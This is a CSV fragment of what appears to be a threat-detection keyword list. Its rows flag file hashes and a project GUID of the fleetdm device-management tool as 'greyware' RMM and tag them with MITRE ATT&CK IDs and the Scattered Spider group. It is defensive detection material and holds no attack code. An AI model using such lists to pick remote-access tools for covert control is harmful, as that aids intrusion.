"*1f88f58c10b8f936cf8058e5effdef6a88ece05393f3c3df2a1247c3d6e651c0*",".{0,1000}1f88f58c10b8f936cf8058e5effdef6a88ece05393f3c3df2a1247c3d6e651c0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*1fd8e5fb9a446742894cec59f3007244ed3ea77b2f7401b6fc42333dc0a0ed51*",".{0,1000}1fd8e5fb9a446742894cec59f3007244ed3ea77b2f7401b6fc42333dc0a0ed51.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*221696c07ae07e3e5892f0538003c1ff036a5a1a89e6a2260fe435695214e3b0*",".{0,1000}221696c07ae07e3e5892f0538003c1ff036a5a1a89e6a2260fe435695214e3b0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*222472878481b038dba079d39e38666a6d49da0fce417645e9439f6385ffaba4*",".{0,1000}222472878481b038dba079d39e38666a6d49da0fce417645e9439f6385ffaba4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2266628a8f1495e4ec904646ee77797367b359aaa3b3a1dd49449031bb5c7878*",".{0,1000}2266628a8f1495e4ec904646ee77797367b359aaa3b3a1dd49449031bb5c7878.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*244b58636bb8104b7b48fbb09402827ad91fd9424a1cb9dc15f8ca353718906d*",".{0,1000}244b58636bb8104b7b48fbb09402827ad91fd9424a1cb9dc15f8ca353718906d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2677ada64618dc9d5ac8f15ee9b377009c34376e72c3f460ada6db202821fbef*",".{0,1000}2677ada64618dc9d5ac8f15ee9b377009c34376e72c3f460ada6db202821fbef.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2699a142ddf7b9f8c30c65c37f4511f6dfb7a8114eab3d4ef026f04a3944fac1*",".{0,1000}2699a142ddf7b9f8c30c65c37f4511f6dfb7a8114eab3d4ef026f04a3944fac1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2c775985d8d4e0262216794d6924aea06a6f9ce9888c6918347e3df3886e8579*",".{0,1000}2c775985d8d4e0262216794d6924aea06a6f9ce9888c6918347e3df3886e8579.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2ce1530925d694ce72da0deda5dc3f7f8ee6b5fe2b3b3ade80973e5b72c35e96*",".{0,1000}2ce1530925d694ce72da0deda5dc3f7f8ee6b5fe2b3b3ade80973e5b72c35e96.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2e441805f8ad1cd674a7d024936547d4268d9b8be63a7b08445ad6e394974f44*",".{0,1000}2e441805f8ad1cd674a7d024936547d4268d9b8be63a7b08445ad6e394974f44.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2e8d4bdf96c2294bb242e69f02fb44afcc5b710bb99d45047ee39d8d22f3f025*",".{0,1000}2e8d4bdf96c2294bb242e69f02fb44afcc5b710bb99d45047ee39d8d22f3f025.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2ec4ee6330d9e05cf8be0e465298e4da33f47e6ab5f93581998dc7ed2837bffd*",".{0,1000}2ec4ee6330d9e05cf8be0e465298e4da33f47e6ab5f93581998dc7ed2837bffd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2f1f3b1b11933cc4f1396967bc588143aaa84313f08cf5aa1c4d009509d4d20d*",".{0,1000}2f1f3b1b11933cc4f1396967bc588143aaa84313f08cf5aa1c4d009509d4d20d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2fc0ed12ef82482e5f7afc1fc61e25f43139421f3a999d366ac1a403b33ece3c*",".{0,1000}2fc0ed12ef82482e5f7afc1fc61e25f43139421f3a999d366ac1a403b33ece3c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*2ff4610933ac3310b66beca9b0f12bb88aa346c5ab8f1cfd4fd03219efbeacc9*",".{0,1000}2ff4610933ac3310b66beca9b0f12bb88aa346c5ab8f1cfd4fd03219efbeacc9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3071cf9b377f62becd8f5ede7a3370eb94499fe28e87a6f6a4be6f6df3c0ac12*",".{0,1000}3071cf9b377f62becd8f5ede7a3370eb94499fe28e87a6f6a4be6f6df3c0ac12.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3212ec3f0ece0d3d4df29f816f2928ca98398c57f110f3e18dbbb656ff56f073*",".{0,1000}3212ec3f0ece0d3d4df29f816f2928ca98398c57f110f3e18dbbb656ff56f073.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*321f8b3fa818470657f9bf25d73016bf13ca8833c32f3c2fd98e54f4ef5d00d2*",".{0,1000}321f8b3fa818470657f9bf25d73016bf13ca8833c32f3c2fd98e54f4ef5d00d2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3277b33dfc78aeaf0a039394592d87ecbdd8a1964a0cca388df58a5684f796c1*",".{0,1000}3277b33dfc78aeaf0a039394592d87ecbdd8a1964a0cca388df58a5684f796c1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*33afcd4459db6fdcd977d24963acff551615be452d0fe8e1df8f862f058d6c48*",".{0,1000}33afcd4459db6fdcd977d24963acff551615be452d0fe8e1df8f862f058d6c48.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3538bb3c8d8d8640f15a31a53e7d688fec5043a5d9ee8ac917da83e699e503e2*",".{0,1000}3538bb3c8d8d8640f15a31a53e7d688fec5043a5d9ee8ac917da83e699e503e2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*376c1371b87dd3ea20ad65ada4ef47f811218382422843a4ecb3fd590fc62c8a*",".{0,1000}376c1371b87dd3ea20ad65ada4ef47f811218382422843a4ecb3fd590fc62c8a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*388d03b5f42d14e0d68541fa74da9abc891e3fb7f7f6daae98d8e0e963c255b4*",".{0,1000}388d03b5f42d14e0d68541fa74da9abc891e3fb7f7f6daae98d8e0e963c255b4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*39e4be4d1d4bb0a5c9bdffd4128901444e603f9c77f5525c87a381131d82f323*",".{0,1000}39e4be4d1d4bb0a5c9bdffd4128901444e603f9c77f5525c87a381131d82f323.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3a137179e0095bf147e50fea7bec3ffb989f0b53d0bbe5bdab21dba5c173b414*",".{0,1000}3a137179e0095bf147e50fea7bec3ffb989f0b53d0bbe5bdab21dba5c173b414.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3ba1b87c659e4c9ca752c50c7e9414ed46f982ce88d668e7d918a95af13315c9*",".{0,1000}3ba1b87c659e4c9ca752c50c7e9414ed46f982ce88d668e7d918a95af13315c9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3bad0a20a77b7839ab4e236d31b4de469a0e0e58ce2195d2d7b2df8decec7ce3*",".{0,1000}3bad0a20a77b7839ab4e236d31b4de469a0e0e58ce2195d2d7b2df8decec7ce3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3e754f15b17e2c21e6579a263990aecdf7652c7994b117d928782cd31cca590a*",".{0,1000}3e754f15b17e2c21e6579a263990aecdf7652c7994b117d928782cd31cca590a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3e81cd5540da875704d3109537203c7381b80b854851fe43ff2c806778b061b0*",".{0,1000}3e81cd5540da875704d3109537203c7381b80b854851fe43ff2c806778b061b0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3f3ab39136e22d9cf714ab609d182d079a5cf2c6acf36d26ec9d88b64b209509*",".{0,1000}3f3ab39136e22d9cf714ab609d182d079a5cf2c6acf36d26ec9d88b64b209509.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3fb343762a0cdfe57ac0e85f3b5cb93dc5579c9d820d4a268ca81e809bea089c*",".{0,1000}3fb343762a0cdfe57ac0e85f3b5cb93dc5579c9d820d4a268ca81e809bea089c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*3ff86dceb685d7dc4b7c14553cc557a3a9eac36e0f0565d8a4c0576f6eee242c*",".{0,1000}3ff86dceb685d7dc4b7c14553cc557a3a9eac36e0f0565d8a4c0576f6eee242c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*40c8f1e14c24fe384c4ed1845716ea52b391c9a867838f0a817e60d9eff6f941*",".{0,1000}40c8f1e14c24fe384c4ed1845716ea52b391c9a867838f0a817e60d9eff6f941.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*43e4ddd1285dfb190c49ab4c6d488369b5ae72234a5d87afd93bc6fc2d675076*",".{0,1000}43e4ddd1285dfb190c49ab4c6d488369b5ae72234a5d87afd93bc6fc2d675076.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4445ad2ca90c814faa03bcbd25681af7063bb0d3f6ae4930e433e9d4b6ae84e3*",".{0,1000}4445ad2ca90c814faa03bcbd25681af7063bb0d3f6ae4930e433e9d4b6ae84e3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4511497ad6ecfef8d3a9fcf7585eb454edf22ea0dae6f77be2c81e7a6539dcd7*",".{0,1000}4511497ad6ecfef8d3a9fcf7585eb454edf22ea0dae6f77be2c81e7a6539dcd7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4524035a526a4871f7165635991d84d188b944dcd74971d3db44335d1e7565fd*",".{0,1000}4524035a526a4871f7165635991d84d188b944dcd74971d3db44335d1e7565fd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*452ef95ff3475ce13c5533a13d6f3e084ec940091c710a75a335d2cdf47ce846*",".{0,1000}452ef95ff3475ce13c5533a13d6f3e084ec940091c710a75a335d2cdf47ce846.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4625292d15399581f185b11ab34ba654c5b10f25bfe917132f7e1dcd19dddc94*",".{0,1000}4625292d15399581f185b11ab34ba654c5b10f25bfe917132f7e1dcd19dddc94.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4655c54ddae45ebc1b2b32a9568af775791964cf9ed6e2198a5d11ce466c23fd*",".{0,1000}4655c54ddae45ebc1b2b32a9568af775791964cf9ed6e2198a5d11ce466c23fd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*47076023e33117b13ed9e9ef7be415067600c180b460a1c73823560de005eb0d*",".{0,1000}47076023e33117b13ed9e9ef7be415067600c180b460a1c73823560de005eb0d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4773c4275d0b56d5b80953003dc9956a6a7aa8c4a016480986fb409aef9b161c*",".{0,1000}4773c4275d0b56d5b80953003dc9956a6a7aa8c4a016480986fb409aef9b161c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4a45903123dc54041be3142c9736129aad4a5a440d1f0388e0b8875808cc3d56*",".{0,1000}4a45903123dc54041be3142c9736129aad4a5a440d1f0388e0b8875808cc3d56.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4a5635751d0b33ed9473bee0c056269d17d33aa3c4a5019d9bb5947a61cb081a*",".{0,1000}4a5635751d0b33ed9473bee0c056269d17d33aa3c4a5019d9bb5947a61cb081a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4bf552065bb179e2da10c1e65463ccc68f451faae21468ebc91ec83308ebbe36*",".{0,1000}4bf552065bb179e2da10c1e65463ccc68f451faae21468ebc91ec83308ebbe36.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4d95694b73357e0e304b68cdbb00bd65da3ffcaa7e2148141dbc4e29357b5a52*",".{0,1000}4d95694b73357e0e304b68cdbb00bd65da3ffcaa7e2148141dbc4e29357b5a52.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4daa7e8e607567451a1db6eb4c297c60a028263756b460c75bc5a31c39bc968b*",".{0,1000}4daa7e8e607567451a1db6eb4c297c60a028263756b460c75bc5a31c39bc968b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4de5606b62d1fe9200c6a473f4d04ebe7a492172e36e8387ec9647c3d399cfd9*",".{0,1000}4de5606b62d1fe9200c6a473f4d04ebe7a492172e36e8387ec9647c3d399cfd9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4e021eda86591c657ec781b77472518ecbf51b4f2a1b63e2ab53ac7289e59428*",".{0,1000}4e021eda86591c657ec781b77472518ecbf51b4f2a1b63e2ab53ac7289e59428.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4e5d34573206efd1a545796a8c2c233a80fe5301c11eee3024e978b0977a4521*",".{0,1000}4e5d34573206efd1a545796a8c2c233a80fe5301c11eee3024e978b0977a4521.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4eb752de605ffcacb6aaf1e613bef1596b6a4583811d1b2fc6b0948df4febddd*",".{0,1000}4eb752de605ffcacb6aaf1e613bef1596b6a4583811d1b2fc6b0948df4febddd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4f4a7ad2eedc23ab3b6127a704fe66efbbda6bc654b98741aa2aadb8293d5864*",".{0,1000}4f4a7ad2eedc23ab3b6127a704fe66efbbda6bc654b98741aa2aadb8293d5864.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4F748D41-5BE1-4626-A0AB-9EA15CDC2074*",".{0,1000}4F748D41\-5BE1\-4626\-A0AB\-9EA15CDC2074.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#GUIDproject","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*4fd9e503868b34bf6c0de86423afd252160aec8f3218458f2a4d3d774b84a99d*",".{0,1000}4fd9e503868b34bf6c0de86423afd252160aec8f3218458f2a4d3d774b84a99d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*52e9a87377d0237b7c1a1c8247898ec1a41bfa2a52af411694ff62b70b64917b*",".{0,1000}52e9a87377d0237b7c1a1c8247898ec1a41bfa2a52af411694ff62b70b64917b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*532f05083cc5b4ef33e473ca5d956da9d9e372673bd3803d20193b879a083487*",".{0,1000}532f05083cc5b4ef33e473ca5d956da9d9e372673bd3803d20193b879a083487.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*54d84eaf8b6d8d6d0b865c39b39a8253c079d571e066d02b50c5d0dd50d1be74*",".{0,1000}54d84eaf8b6d8d6d0b865c39b39a8253c079d571e066d02b50c5d0dd50d1be74.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*54ef26ef5847752d4acc732de7e294cb02766d89fc5eb30ead4de42cea331d79*",".{0,1000}54ef26ef5847752d4acc732de7e294cb02766d89fc5eb30ead4de42cea331d79.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*568be7e64dc6dd20516910fe1cd2db611fee2b3051b2ff81ca1ef092bf3bbd91*",".{0,1000}568be7e64dc6dd20516910fe1cd2db611fee2b3051b2ff81ca1ef092bf3bbd91.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
